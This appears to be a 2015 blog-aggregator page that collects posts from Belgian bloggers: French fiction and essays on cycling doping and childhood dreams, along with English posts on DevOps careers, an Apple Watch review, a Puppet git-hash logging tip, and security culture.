C’est au tour d’Isa de me lancer un regard étonné. J’insiste :
— Est-ce qu’ils gagnent de l’argent par après ?
— Que veux-tu que j’en sache ? Je leur fais passer le test, je signe le papier et, parfois, je les revois quelques mois après pour une nouvelle startup. Des sérial-entrepreneurs qu’ils s’appellent ceux-là. Bon, je vais chercher les billes. Restez bien là !

Au moment de sortir, Isa me fait un imperceptible clin d’œil et m’indique d’un petit mouvement de tête une porte au fond de la pièce. J’attends une seconde avant de bondir :
— Vite !

Junior m’emboîte le pas. Nous découvrons un couloir qui va en s’évasant. En son centre se trouve un espace dégagé où s’amoncèlent des containers ovoïdes de différentes tailles.
— Le terminal, souffle Junior. Logique, il est en plein milieu du bâtiment.
— Je ne vois rien que des boîtes. Où est ce fameux intertube ?
— Sous tes pieds !

Se penchant, Junior révèle une large trappe à même le sol.
— C’est le moment de vérité. Prends la plus grande boîte que tu puisses trouver !

J’en saisis une au hasard. Junior la glisse dans la trappe. Les deux ouvertures coincident parfaitement.
— Bon, et bien, au premier d’entre nous.
— Moi, réponds aussitôt Eva, sans hésiter.

Avant que j’aie le temps de réagir, elle se glisse dans l’espèce d’œuf en plastique et s’y recroqueville. Je réalise alors que chaque boîte possède un minuscule écran sur sa facade. Junior y tapote les coordonnées « A12-ZZ74 ».

— Eva, je ne mets pas le verrou de sécurité. n’essaie donc pas d’ouvrir la boîte tant que tu ne seras pas complètement immobilisée.

Sans lui laisser le temps d’acquiescer, il referme la trappe et appuie une dernière fois sur l’écran. Un bruit de courant d’air se fait entendre. Junior réouvre la trappe. L’espace est désormais vide, Eva a disparu.

— Au suivant ! annonce-t-il avec un sourire en jetant une seconde boîte dans l’ouverture.
— Mais il y a un problème ! Comment vas-tu entrer les coordonnées pour ta propre boîte ? fais-je en m’introduisant dans l’exigu réceptacle.
— Va falloir que j’aille très vite.

À peine ai-je réussi à entrer tous mes membres dans une inconfortable position fœtale que la trappe claque au-dessus de ma tête. Mes poumons sont soudainement comprimés et, pendant une seconde, j’ai l’impression que mes yeux tentent de sortir de leur orbite.

 

Photo par It is Elisa.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at July 21, 2015 09:14 PM

Frank Goossens

Want to beta-test Autoptimize power-ups?

So I’m currently working on “power-ups” for Autoptimize, which I might commercialize later this year. Some examples of functionality I’m developing;

Drop me a line If you’re interested in beta-testing these power-ups, with a small description of where you would run this beta.

by frank at July 21, 2015 08:07 AM

July 20, 2015

Mattias Geniar

The Worst Possible DevOps Advice

The post The Worst Possible DevOps Advice appeared first on ma.ttias.be.

It's not a link bait title, bear with me as I try to explain myself.

Every once in a while, I get asked the question of "how to be better at DevOps". This is an extremely confusing question, because it depends entirely on what DevOps means to you.

define ( 'DEVOPS' );

For some, it means Infrastructure As Code (Puppet, Chef, Ansible, ...). For others, it means collaborating between developers and operations more, exchanging ideas and documentation. Others see it as a single person doing both development and system operations.

Whatever DevOps means to you, it's OK.

There is no single definition that works for everyone, despite what Wikipedia might say.

To me, this is what DevOps means:

DevOps is about understanding each other. It's about developers understanding enough of the IT infrastructure to have it make sense. It's about sysadmins knowing enough about development to be able to speak on the same terms. Once you understand each others' vocabulary and system setup (both dev and ops), communication and collaboration comes naturally.

Once you start to collaborate, you can inherit each others' best practices and design patterns. You'd be amazed how much system administration and software development have in common in terms of writing code, testing, monitoring and automation.

With that said, how do you get better at DevOps?

Getting Better At DevOps

Well, this is the part where I hate to say the words.

You see, to me DevOps isn't a single person doing both development and operation. It's far from it. I think having both qualities, to be able to develop and manage your infrastructure, is very rare. You may think you're good at both, but chances are you're better at specializing in one area and focussing on it.

It's for this exact reason we all mock the recruiters looking for DevOps engineers, thinking they can find someone to fulfill both the developer and operations role in a company at the same time. That's just not how it works.

Yet, as much as I mock those recruiters (or the companies looking for that same silver bullet), DevOps is partly about Ops doing Dev work and Dev doing Ops work. Just not in the same way companies see it.

If you're {dev,ops}, try some {ops,dev}

What has helped me the most in my professional career, was the fact that I started as a developer and slowly switched to system administration. It gave me the background I needed to fully understand my role as a sysadmin.

My best piece of advice I can give anyone trying to be better at DevOps? Switch roles.

If you're an ops, try some dev

If you're currently a system administrator, try to write an application the same way your coworkers/clients would.

To put this in my perspective, from a hosting industry point-of-view, that means understanding mostly PHP (80%), Ruby (10%), Java (5%) & NodeJS (5%).

If you're a fulltime sysadmin, try to write a web application in your spare time. Make it a hobby. Use a popular framework like Symfony, Laravel or Zend Framework 2. Use Composer. Write unit tests. Try some Test Driven Development (TDD). Deploy your code in an automated way.

Need a concrete challenge? Write a TODO-list application that can send reminders by mail if you've missed a time-based TODO (aka a deadline). It gives you UI design, background tasks, you can use validation libraries through composer, you can write tests, ...

Understanding object-oriented designs, patterns like singleton & MVP, template engines, application-based caching layers, ... will all make you appreciate your sysadmin tasks even more.

It will give you insight in how the application needs to work together with the system.

devops

If you're a dev, try some ops

If you're currently a developer, set up your own server and manage it yourself.

Install your own server, preferably the same kind your coworkers/clients would use, and manage it entirely by yourself. Try some Ansible to get a feel of infrastructure as code. Or try Chef or Puppet, if you're looking for a slightly more complex setup. Set up unit testing for your own infrastructure code. Check out ServerSpec.

Configure your own monitoring. Set up alerting. Play with the triggers until you get notified when needed, not sooner. Just set it up on the same server you're managing. Get a feel of what it's like to configure it entirely by yourself.

(So just to be safe, if you're actually going to use your own server, add some external monitoring as well. Installing the monitoring on the same server is just to get the feel from managing it entirely by yourself.)

Configure backups. Add some monitoring to your backups. Now secure your server. Add HTTPs. Add some firewalling. Benchmark your system and squeeze every last drop out of it.

Now that you have your system running, move every component to it's own Docker container. Set up private networking and a persistent datastore. Expose only your public ports.

And then if you think you're ready, destroy your server and run a single configuration management command to completely deploy your server again from scratch, using the same infrastructure as code tools you just learned to use.

Dip Your Toes

So as much as I hate recruiters looking for the silver bullet, there is some truth to it. If you want to be a better sysadmin, try to be a dev. If you want to be a better dev, try to be a sysadmin. There, I just gave you the worst possible piece of DevOps advice. Right now, I'm sure there's some recruiter doing a happy dance for his victory.

Just understand that you're probably better off focussing on one area and keeping the other as a hobby. It's extremely hard to master both. Make sure you master one and play around with the other.

The post The Worst Possible DevOps Advice appeared first on ma.ttias.be.

by Mattias Geniar at July 20, 2015 07:07 PM

Joram Barrez

The Activiti Performance Showdown 2015

It’s been three years since we published the ‘The Activiti Performance Showdown‘, in which the performance of the Activiti engine (version 5.9 and 5.10) was benchmarked. Looking at my site analytics, it’s high in the top 10 of most read articles: up until today, 10K unique visits with an average time of 7 minutes (which is extraordinary in this […]

by Joram Barrez at July 20, 2015 11:23 AM

July 19, 2015

Lionel Dricot

Pour un dopage éthique et propre

2816353186_41783aace3_o

Comme chaque année, le mois de juillet nous apporte le traditionnel tour de France et son inséparable débat sur le dopage, débat qui permet de doper, c’est le cas de le dire, l’audience des médias traditionnels en ces périodes creuses.

Le fond est toujours le même : les performances de certains cyclistes sont trop incroyables pour être naturelles.

L’argument, qui démontre soit une hypocrisie totale soit une incompréhension profonde, a désormais pris une nouvelle dimension depuis que le vocabulaire s’est mué en « tricherie » et les victoires mises en doute comme étant « volées ». Désormais ils y a les « bons » et les « tricheurs-voleurs »

 

Qu’est-ce que le dopage ?

Car, au fond, avant tout débat, la question est primordiale. Je vous laisse donc réfléchir un instant.

En fait, il n’y a pas de définition claire ou unanimement acceptée de dopage. Il s’agit ni plus ni moins d’une liste parfaitement arbitraire de comportements et de produits qui sont bannis car considérés comme du dopage.

Historiquement, le fait même de s’entraîner était considéré comme « indigne d’un gentleman » car cela donnait un avantage non-négligeable sur les adversaires.

Avec les progrès de l’entrainement scientifiquement calibré et de l’alimentation, les limites entre le dopage et le simple fait de se nourrir/soigner/s’entraîner deviennent de plus en plus floues !

Le nageur Michael Phelps avait même été accusé de dopage pour avoir… écouté de la musique favorisant la concentration avant des compétitions !

 

Oui mais il y a bien une liste de produits interdits !

En effet. Mais cette liste est variable d’années en années et peut être différente en fonction du pays ou du sport pratiqué (même si un travail d’harmonisation a été fait) !

Pour ajouter à l’arbitraire, certains produits sont considérés comme du dopage sauf en cas de prescription médicale. Ce qui fait que la plupart des sportifs d’endurance ont désormais un mot du médecin attestant qu’ils sont asthmatiques.

D’autre part, certains produits nous parviennent à travers l’alimentation. C’est d’ailleurs l’un des arguments en faveur des produits bios : nous sommes bourrés de tous les antibiotiques/hormones qui servent à… doper les animaux dont nous nous nourrissons.

Enfin, la plupart des produits dopants ne font qu’augmenter la quantité de certaines substances déjà présentes à l’état naturel dans notre corps.

À cela, il faut rajouter des produits qui, bien que dopants, sont parfaitement autorisés pour des raisons culturelles. La caféine, par exemple, qui est un excitant notable. Après tout, on ne va pas interdire une tasse de café, non ? Du coup, les cyclistes ont tout à fait le droit de prendre des gélules de caféine concentrée à quelques kilomètres de l’arrivée, histoire de se booster pour le sprint final. Ce n’est pas du dopage !

 

Il n’y a qu’à fixer une limite pour chaque produit, comme l’alcoolémie au volant !

C’est exactement ce qui est fait actuellement mais c’est, encore une fois, complètement arbitraire.

Certains sportifs, que ce soit génétique ou à cause de leur entrainement, ont des valeurs très élevées pour certains indicateurs. Doivent-ils être pénalisés ? D’autres, au contraire, prennent ces indicateurs comme la limite de dopage tolérée. Est-ce acceptable ?

Ce qui est encore plus rigolo c’est que certains comportements sont parfaitement autorisés (comme s’entraîner en altitude) mais d’autres, qui ont exactement le même effet, sont bannis (l’auto-transfusion ou les « tentes d’altitude », qui permettent de simuler l’altitude en créant un espace de faible pression).

 

Oui mais les performances sont quand même surnaturelles !

Une fois encore, c’est mal comprendre le dopage. Le dopage augmente très peu la performance brute : ce n’est pas en s’injectant un produit qu’on devient un champion.

Admettons que le dopage augmente même de 10% les performances brutes (et ce serait vraiment incroyable), il s’ensuivrait qu’un cycliste escaladerait un col à 19km/h au lieu de 21km/h. Une différence qui est absolument imperceptible pour le spectateur qui est devant sa télévision : les deux performances sont surhumaines !

À côté de ça, d’autres facteurs ont des influences énormes. Prenons un exemple au hasard : un coureur cycliste bien abrité du vent par ses équipiers pendant la durée d’une étape diminue son effort de près de 50%. Si son matériel est très aérodynamique, il gagne encore 3 ou 4%. Cela lui donne un avantage considérable au pied du col ! S’il a mieux dormi, si sa digestion est un poil meilleure, si son pic de forme a été calibré pour ce jour particulier, il va donc écraser la concurrence. Il est donc complètement irrationnel d’accuser un coureur de dopage juste parce qu’il prend l’ascendant sur ses adversaires au cours d’une montée !

Rajoutons que, généralement, on parle de performance surhumaine pour un cycliste qui est arrivé avec… une ou deux minutes d’avance sur son concurrent après près de 200km ! Comme si cette minute établissait la limite entre le naturel et le surnaturel.

À titre de comparaison, lorsque je suis très en forme, je peux gagner une minute sur un parcours… de moins d’un kilomètre ! Les cyclistes sont donc tous d’un niveau incroyablement proches. Un journaliste avec un peu de recul et d’intelligence devrait, au contraire, s’interroger sur le fait que les performances soient à ce point similaires.

Statistiquement, le problème n’est donc pas que le gagnant aie une minute d’avance. C’est que le second n’aie qu’une minute de retard !

 

On fait pas 200km par jour sans être dopé ! Ce n’est pas humain !

À peu près tous les sports produisent des records inhumains. La plupart d’entre-nous sont incapables d’atteindre la vitesse de 20km/h en course à pied, même sur une courte distance. Pourtant, c’est bel et bien la moyenne à laquelle courent les recordmen du marathon durant 40km, une distance qui semble inimaginable pour un jogueur débutant.

Est-il humain de sauter au dessus d’une barre à près de 2,50m de hauteur sans la toucher ? Est-il humain de sauter une longueur de près de 9m ? De sauter une barre à plus de 6m avec une perche ? De rester sans respirer plus de 10 minutes ? De descendre sans respirer à plus de 100m de profondeur en nageant simplement la brasse ?

Par définition, les champions d’un sport sont des surhommes. Dans les sports les plus populaires, les futurs champions sont repérés très jeunes et suivent un programme spécifique visant à ce que leur croissance optimise les muscles qui seront utilisés dans leur sport de prédilection.

Ils s’entrainent toute leur vie et tout au long de l’année, ils ne font jamais le moindre écart alimentaire. Leur assiette, leur temps de sommeil (et parfois leur activité sexuelle) sont réglementés par une armée de médecins. Ils sont calibrés, au jour et à l’heure près, pour être à leur pic optimal de forme physique le jour de la compétition.

Le jour même, ils bénéficient du meilleur matériel imaginable, d’un entourage complet, d’une concentration optimale.

Alors, est-ce tellement étonnant qu’ils aient des performances anormales ?

 

Es-tu en train de dire que les cyclistes ne sont pas dopés ?

Pas du tout. C’est même très possible que la plupart le soient, d’une manière ou d’une autre et à des degrés divers. D’où l’hypocrisie totale de s’attaquer au gagnant, qui n’est sans doute pas plus dopé que les autres, surtout si ceux-ci ont a peine une ou deux minutes de retard.

Le dopage n’est pas blanc ou noir, c’est une affaire très complexe.

De plus, et j’insiste sur ce point, les performances brutes ne sont en aucun cas des preuves de dopage.

Le dopage ce n’est pas que la performance le jour de la compétition, c’est également utilisé durant l’entrainement, afin de construire la masse musculaire, afin de dépasser le coup de mou inévitable qui doit survenir un jour où le sportif resterait bien en pantoufles à la maison. Le dopage est donc beaucoup plus subtil qu’une simple pilule qui doublerait la vitesse de pédalage du jour au lendemain.

 

Tu ne proposes quand même pas qu’on légalise le dopage ?

Pourquoi pas ? Au moins, ce serait clair. Il n’y aurait pas d’hypocrisie.

Posons la question autrement : pourquoi ne veut-on pas accepter le dopage ?

La seule réponse que je trouve c’est que, comme la drogue, le dopage est dangereux. Les athlètes dopés mettent leur santé sérieusement en danger. Avec un dopage extrême, devenir athlète serait suicidaire (ce qui augmenterait à mon avis les audiences mais passons…). Les règles anti-dopage sont donc là pour les protéger.

Or, comment luttons-nous contre le dopage ? En pourchassant et punissant… ceux que l’on veut protéger ! Tout comme la lutte contre les junkies, la lutte contre le dopage ne peut pas fonctionner de cette manière. Le dopage n’est, pour les sportifs, pas une manière de gagner : c’est avant tout une manière de ne pas perdre ! Dans le sport de haut niveau, il n’est pas rare que l’athlète aie le sentiment que si ses performances ne sont plus au top, il se retrouvera du jour au lendemain à la rue. Le dopage est donc extrêmement tentant voire indispensable. Il se retrouve même en dehors du sport dans le monde du travail où, là aussi, les performances sont passées à la loupe.

Je peux donc difficilement en vouloir à un sportif qui se dope. À la limite, le fait de mentir et d’être hypocrite me choque plus. J’aurais le plus grand respect pour un sportif qui avouerait et expliquerait en détail le « système » sans y être acculé par un juge.

Par contre, je me demande comment un médecin qui participe à tout cela peut encore se regarder dans la glace ?

Pourquoi punit-on les sportifs et laisse-t-on les médecins continuer leur métier impunément ? Ainsi que ceux qui, en connaissance de cause, ont payé le salaire de ces médecins.

Pour moi, tout médecin qui aurait aidé ou encouragé un patient à prendre des produits potentiellement nocifs pour sa santé devrait être radié de l’ordre des médecins et jugé comme un dealer de drogue. Les sponsors et financiers devraient être condamnés de la même manière.

Ce n’est sans doute pas une solution ultime mais je reste persuadé que s’attaquer aux sportifs est injuste et contre-productif. Ce serait comme vouloir lutter contre la drogue en punissant les junkies mais en laissant ouvertement les dealers et les barons opérer.

Peut-être qu’on pourrait arrêter de parler de dopage et condamner ceux qui, par leurs actes ou leurs prescriptions, mettent en danger la santé d’autrui. Le sport de haut niveau permettrait alors de développer des produits et des aliments qui nous aideraient à mieux vivre et qui auraient un impact positif sur la santé. Tout produit qui se révélerait nocif, même à très long terme, serait immédiatement rejeté par les coureurs eux-mêmes.

Le sport de haut niveau deviendrait donc un moteur positif d’innovation, un laboratoire pour la santé et la connaissance du corps humain, ce qu’il est déjà pour le matériel et la technologie.

De toutes façons, comme je le décrivais dans « À l’ombre de la Grande Boucle », le dopage va bientôt devenir indétectable. N’est-il donc pas préférable de le changer en quelque chose de positif plutôt que de continuer à se voiler hypocritement la face ?

 

À long terme, le Coca-Cola ou la cigarette sont également extrêmement nocifs. Avec ton raisonnement, il faudrait condamner ces fournisseurs !

Voilà, tu as parfaitement compris où je voulais en venir.

 

Photo par Cold Storage.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at July 19, 2015 09:44 AM

July 17, 2015

Frank Goossens

Music from Our Tube: shoegazing jazz-rocking wicked drummer

One of the many gems discovered while listening to random old “It is what it is”-shows; Mice Parade‘s “Pretending”;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Said Laurent;

Le batteur on as toujours l’impression que c’est le mec du Muppet show, on a l’impression qu’il a 42 mains avec 75 fus. Il joue comme un dingue, vous allez voir. Plus le morceau avance, plus qu’il joue.

by frank at July 17, 2015 01:18 PM

Mattias Geniar

My Apple Watch Review

The post My Apple Watch Review appeared first on ma.ttias.be.

I'm a gadget fan. After a few weeks of hesitating (it is expensive, isn't it?) I decided to get myself an Apple Watch. Here's my take on said watch and if I'd recommend it or not.

I bought the 42mm Watch Sport in Space Gray Aluminum. At around 500eur (overseas shipping included) it was the second cheapest Apple Watch. Only the smaller 38mm would have been around 50eur less.

Before you judge me, I'll admit it right here: that's an awful lot of money to be spending on a gadget.

Getting the watch in Belgium

Belgium, where I live, officially isn't selling the Apple Watch yet. Our neighbouring countries like France, the Netherlands and the UK, do.

I placed my order around 3-4 weeks ago. Back then, I had a choice between France or the UK. Netherlands wasn't an option yet. I could've ordered the watch online in France and pick it up in a store. It probably would have been a ~500km drive. I didn't do that.

I chose to order the watch in Apple UK and have it shipped to my Borderlinx account. Once it arrived, I used Borderlinx/DHL to ship it over to Belgium. It ended up costing me an additional 40eur in shipping though.

Unboxing

This is such a nerdy thing to be excited about.

But if you've ever gotten something from Apple, it is something that stands out. The packaging is amazing. The attention to detail really stands out.

The Apple Watch Sport comes in a rectangular box. If you order the Apple Watch (not the sport), the packaging is different.

apple_watch_unboxing_1

Once opened, you're greeted with yet another box, with 2 handy pull-out strings to the sides.

apple_watch_unboxing_2

The box that comes out of it has a simple pull-string to remove the plastic surrounding it.

apple_watch_unboxing_3

Inside, the Watch is displayed with the default strap.

apple_watch_unboxing_4

Underneath the Watch are the accessories: the charging cable and plug.

apple_watch_unboxing_5

Below that, an additional strap is included. It's slightly shorter than the one it comes attached with, in case you have smaller wrists.

apple_watch_unboxing_6

Charging happens via induction. The Watch magnetically clicks to the charger. There's no USB or cable directly attached to the Watch.

apple_watch_unboxing_7

Starting & Syncing

The Watch works via bluetooth low energy, so it needs pairing with your iPhone. Traditional bluetooth pairing uses a 4-digit key code you enter on both devices to pair.

It doesn't quite work that way on the Watch. The pairing is best compared to a QR-code. You scan the watch with your phone, after which the pairing succeeds. The visuals included in the process are a stunning high-res pixel explosion.

apple_watch_sync

Once the sync is completed, the phone will start to sync your current Watch Compatible apps over to the Watch.

apple_watch_syncing_2 apple_watch_syncing_1


The animations on the Watch and the iPhone app are kept in perfect sync. It's these details that make the difference.

This process took longer than I would have thought. The Watch was easily syncing for 4-5 minutes.

Watchfaces

A couple of the podcasts I listen to all mentioned they were using the Utility watch face (like the ATP folks). I admit, it's a very nice watch face. It has sufficient options to reduce the details on-screen and choose your custom complications, the little widgets shown on the watch in the corners and bottom.

apple_watch_face_1

I changed to the Solar watch face for a few days, because I liked the simplicity of it. Just a clock and a nice HD animation of the sunset and sundown.

apple_watch_face_solar

I eventually swapped it out for the Modular watch face, which I'm still using now. The lack of complications on the Solar watch face was a deal breaker.

apple_watch_face_current

It's super convenient to have a couple of complications on-screen: date, temperature and the activity tracking rings.

Time to stand!

If enabled, every hour the watch will tap you slightly and motivate you to take a small walk. Stretch those legs a bit.

It's a fun feature. I'm not sure if I'll still obey the watch after our gadget-honeymoon period, but for now it's a cool novelty that gets me to stand up a little more during the day.

apple_watch_stand_reminder

The only downside: if you're taking a nap during the day, this'll tap your wrist and will probably wake you.

Taps, taps and taps

Among nerds, it's pretty well known that the Apple Watch doesn't vibrate on notifications, it taps.

It isn't just a marketing term, it actually feels like a tap. Definitely not a vibration on the watch, more of a gentle nudge.

Which brings me to the downside of taps vs. vibrations: they can go by unnoticed.

There's an option called Prominent Haptic Feedback on the watch. It'll tap you an additional time on notifications.

apple_watch_prominent_haptic

Even with that option, I keep missing taps. I feel a vibrating watch would probably have caught my attention better.

While it certainly isn't the end of the world to miss a few notifications, it is inconvenient. And in a job where being on-call means responding to text alerts and push notifications, it can be annoying.

Watch vs. Phone

The Watch needs the Phone to work. It's standalone functions are extremely limiting.

Yet while the watch needs the phone, I notice I am using the phone less. I'm less distracted.

We've all done the routing where we get a notification on the phone, check it out, open a completely unrelated app (out of reflex, automation, ...) and start browsing the web or reading tweets. Once the phone gets my attention, it keeps my attention.

Since the watch is such a limited device in terms of input, it's mostly a read-only device to me. I read my notifications, perhaps answer with some canned responses or dictated message. But I won't go reading the news on it. Or opening Twitter. Or read all my mails.

It's strange how a device with less features than the phone managed to reduce my time on the phone.

Hey Siri, ...

The only means of input on the watch is via dictation. That means you talk to Siri.

I'll be honest: I still feel like a complete douchebag when I'm talking to Siri and dictating text or a command. I'll never do this in public or in front of others.

It is convenient when I'm in the car or when I'm alone. In all other circumstances, I'll actively try avoid using it.

Other than that, I find Siri dictation to get my input right around 75% of the time. Other times it just completely fails to work or misinterprets my voice entirely. A 75% success ratio is terrible if it's your only means of giving input.

Battery Life

Not an issue, at all.

apple_watch_charged_evening

After a full day of usage, I never got it below 60% battery when I went to sleep.

If you want to use it as a sleep tracking device, it'll surely survive a 24 hour period. You can charge it during the day or on your commute to work.

Apps

There aren't a lot of apps I use on the device. Here are the ones that stand out to me.

I'm curious what watchOS 2.0 will bring in terms of additional functionality.

The 2.0

Speaking of new releases, I'm wondering if Apple will launch version 2.0 of the Watch hardware anytime soon.

The iPhone cycle is very clear: every 2 years there's a new model, every other year the current model gets an internal hardware upgrade.

To me, the Watch has sufficiently strong hardware: retina/HD display, it's responsive enough, the touchscreen works flawlessly, ...

Apple has an obsession with the thinness of their devices. At each iteration, they'll attempt to make it more thin. I suspect that's what'll happen to the watch as well. There's no need for a faster CPU or more memory, but the next version will be thinner. And at time I'll look at this watch and realise how bulky it looks.

Even though at this point, the watch doesn't feel heavy or thick, at all.

Managing calls

One of the most useful features, to me, is being able to identify a caller without looking at your phone. The phone is usually buried somewhere in a jeans pocket and it isn't always convenient to take it out.

The watch instantly shows you who's calling. You can even answer the call on the watch, quietly walk to your phone and resume the call there via handoff.

apple_watch_caller_id

If you scroll down on the watch during a call, you get the pick some canned responses to answer. You don't need to look at your phone anymore.

apple_watch_caller_actions

The "answer on the phone" option will answer the call and place it in a sort of "hold" state, until you can get to your phone and resume the call, in case you don't like talking to your Watch like inspector gadget.

This kind of detachment from my phone has changed how I keep my phone with me. Now, I can more easily let the phone lay in my nightstand or in the kitchen, and comfortably walk around knowing I can still receive calls and be alerted of text messages.

Until the Watch, I anxiously kept my phone with me at all times, for the fear of missing out.

Conclusion: Expensive Gadget

After a one week usage, I can conclude what I had expected when buying the Apple Watch: it's an expensive gadget that's really fun to play with.

The Watch keeps me focussed more, with less time spent on my phone. Notifications are very convenient to have on your wrist. The sport/activity tracking motivates me to get up and walk.

It's functionality is limited though. It's a watch, but not a smart watch per sé. I look forward to the Google Now alternative from Apple. I believe the Watch has everything available to become a really powerful platform and a great extension to your phone.

Would I recommend you get a watch? If you like gadgets, appreciate the Apple ecosystem and have some money to spare, then yes: get one.

If you just have an iPhone, the Watch probably doesn't offer that much additional benefit. If you're heavily invested in the Apple ecosystem (Apple TV, Airplay, Mac, iPhone, iPad, ...), the Watch has more to offer since it interacts with each of those devices flawlessly.

If you're looking for a brutally honest Apple Watch review, I highly recommend The Oatmeal's "8 things I learned from wearing an Apple Watch for a couple of weeks".

The post My Apple Watch Review appeared first on ma.ttias.be.

by Mattias Geniar at July 17, 2015 06:53 AM

July 15, 2015

Lionel Dricot

Enfant, j’espérais un jour…

3522987742_05d1a76c63_z

Enfant, je n’aimais déjà pas manger. J’espérais, sans trop y croire, pouvoir un jour me contenter de prendre des pilules contenant tout ce dont j’avais besoin et ne plus être préoccupé par la nourriture. Après tout, cela existait dans la majorité des livres de science-fiction dont je m’abreuvais.

Aujourd’hui, si ce ne sont pas des pilules, nous n’en sommes guère loin et je suis un homme comblé.

 

Enfant, je n’étais pas soigneux avec la paperasserie. Mon écriture manuscrite n’était pas très jolie et toutes mes feuilles se chiffonnaient immédiatement. Les trous se déchiraient et les feuilles volaient au milieu de classeurs. Je détestais mettre des œillets sur les trous. Être soigneux me semblait une perte de temps et sans le moindre intérêt. Adolescent, j’ai même dessiné les plans d’une perforatrice qui mettait automatiquement les œillets (appelée plus tard la « dricoratrice » par des camarades de classe).  Reprenant le problème, j’ai ensuite imaginé d’injecter de la résine directement dans le trou pour le solidifier. Puis, à la lecture d’un article de Science & Vie Junior sur un prototype de « papier électronique », j’ai imaginé avoir un classeur qui contiendrait une seule feuille électronique et un clavier, pour prendre des notes directement. En classe, plutôt que photocopier, le professeur se contenterait de transmettre une « feuille électronique » qui s’afficherait automatiquement dans notre classeur.

Aujourd’hui, je n’imprime plus. Tous les documents que je souhaite sont scannés en un clic sur mon téléphone et sont accessibles sur mon ordinateur, mon téléphone et ma tablette.

 

Enfant, j’adorais lire et chaque seconde passée loin des livres me semblait une seconde perdue. Mais les lourds et volumineux volumes restaient pour la plupart du temps à la maison et n’étaient guère pratiques. Lors de trajets en voiture, je ne pouvais lire qu’à la lumière du jour, m’usant les yeux jusqu’à l’ultime seconde du crépuscule. J’avais imaginé ce que j’appelais « la lecture du pouce ». Une petite puce électronique qui contiendrait toute ma bibliothèque et qui enverrait directement à mon cerveau, à travers le nerf de mon bras, l’histoire contenue dans le livre. Je pourrais lire en permanence, même dans le noir et sans même m’arrêter pour changer de livre.

Aujourd’hui, mon livre électronique ne me quitte plus. J’emporte en permanence une bibliothèque ultime qui contient également des nouveautés mises en ligne la veille par leur auteur et qui ne seront, peut-être, jamais imprimées. Je peux lire debout, dans une file d’attente, le soir, dans le noir. Sans même m’arrêter entre deux livres.

 

Enfant, j’étais incroyablement frustré par le fait que les sondes Voyager ne soient pas passées à proximité de Pluton. J’étais passionné par le système solaire, l’exploration spatiale et je voulais me représenter Pluton, ma planète préférée.

Aujourd’hui, après avoir découvert la surface de Titan, je suis tout ému de découvrir le visage de Pluton.

11311925_687877714680167_484233801_n

 

Chaque jour, j’apprécie la chance que j’ai de vivre dans le futur, de réaliser mes rêves d’enfant.

 

Photos par Sergey Galyonkin et Nasa.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at July 15, 2015 05:30 PM

Laurent Bigonville

Print git hash during puppet run

So here a little trick that I implemented @customer

During each puppet run, the git commit hash of the puppet manifest
being applied in printed on in the logs instead of a timestamp:

# puppet agent -t
Info: Retrieving pluginfacts
Info: Retrieving plugin
Info: Loading facts
Info: Caching catalog for host1.example.com
Info: Applying configuration version ’38f861974ef7041752c0051cfbca676544dc1cef’
Notice: Finished catalog run in 9.78 seconds

To achieve that, I’m just storing the git hash in a file
(something like “echo $GIT_COMMIT > .gitversion”) when building the package in jenkins
and then deploying it in the rpm.

In the puppet server configuration I have the following configuration
line:

config_version = /bin/cat $confdir/environments/$environment/.gitversion

by bigon at July 15, 2015 01:05 PM

Frank Goossens

Going Norway or the highway

So we went to Norway for our summer vacation this year. Beautiful country, lots of fjords and lots of waterfalls and lots of tunnels too (the longest one over 24km, the trip back over the mountains was all the more impressive).

Just one picture here (friends & family saw a lot more on FB), with me and my two lovely ladies at the Stegastein viewpoint:

stegastein_norway_holiday_2015

by frank at July 15, 2015 09:41 AM

July 14, 2015

Xavier Mertens

Don’t (always) blame the user!

BlamingOften, as security professionals, we tend to blame our users. Not all people are security aware and take the right decision when facing a potential security issue. Yes, we know: they click, they open, they answer questions, they trust, …


But let’s be realistic, sometimes they make bad actions just because of us. Our mission is to protect our employer’s or customer’s data and their team members against more and more threats. To achieve this, we take decisions for their own sake: we deploy new tools, new controls and procedures. We get paid for this job as well as the users: they get paid too to perform other tasks. Today, computers are everywhere and almost all people working in a company have to use them and network resources.

I was browsing through the huge amount of data leaked from HackingTeam, searching for juicy information about Belgium. I found an email with this signature:

>LASTNAME Firstname
>Position
>Department/Organization
>Tel : +32-xxx.xxx.xxx
>Tel : +32-x.xxx.xx.xx
>Belgium
>user@<organization>.be (without attachment)
>nick@<well-known-isp>.be (attachment OK)

My first reaction was a big “WTF?!?“. He/she asks to send files to a private mailbox hosted by a well-known Belgian ISP. Is this mailbox properly protected? Does he/she use a strong password? Is the password share across multiple services? We know that attachments may potentially contain very sensitive information!

After the first reaction and a few deep breathes, I took some time to think deeper. Maybe this is the only alternative for this user to receive files from external contacts. The system in place in his/her organization might be too restrictive, too slow, under sized to handle the total amount of processed data. I don’t know the reason but one think is for sure: humans are excellent in finding evasive ways to get stuff. From his/her point of view, the employee is just trying to get things done. Let’s go back to the example above. IMHO, trying to block everything at all costs is a wrong approach. We often forget that the IT department is offering services to the end-users. It implements tools to help them to work efficiently and it goes in the same way regarding security. We have to implement tools and procedures to help people to work in a safe environment.

The next time you reject a request from a user for “security reason“, don’t just say “No!” but “No, because…“. Explain why and propose an alternative matching at best his/her requirements and yours (from a security point of view). In the example describe in this post, if people must exchange files with external contacts, why not deploy a file sharing service coupled with a strong scanning of the incoming files? Everything is possible but requires to invest some time and money… Wait… That’s maybe the real problem? :-(

 

by Xavier at July 14, 2015 02:34 PM

Frank Goossens

Zap Flash before it zaps you

Lots of 0-day exploits on Flash, supposedly due to a hacking-for-money company having been hacked. Remove/ disable Flash if you value your security!

by frank at July 14, 2015 10:58 AM

July 13, 2015

Mattias Geniar

